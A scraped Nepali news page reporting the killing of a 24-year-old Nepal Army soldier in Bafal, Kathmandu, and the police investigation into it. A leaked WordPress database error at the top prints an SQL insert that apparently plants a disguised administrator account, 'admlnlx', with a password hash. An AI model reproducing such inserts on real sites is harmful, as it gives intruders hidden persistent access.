WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl2O7.93jZZdGGVTEL8J1q6a3unrNJ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:59:08', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस २९ –
काठमाडौंको बाफलमा नेपाली सेनाको अमलदारको हत्या भएको छ। आर्मी मेडिकल कलेज सानो भर्याङमा कार्यरत २४ वर्षीय युवराज घिमिरेको हत्या भएको महानगरीय अपराध महाशाखाका डिएसपी दीपक रेग्मीले जानकारी दिए। स्युचाटार घर आउने क्रममा उनको हत्या भएको हुनसक्ने प्रहरीले अनुमान गरेको छ। टाउकोमा गम्भीर चोट लागेका उनको कर्तब्य ज्यान नै भएको प्रहरीको निष्कर्ष छ। हत्याका सम्बन्धमा प्रहरीले छानबिन अघि बढाएको छ।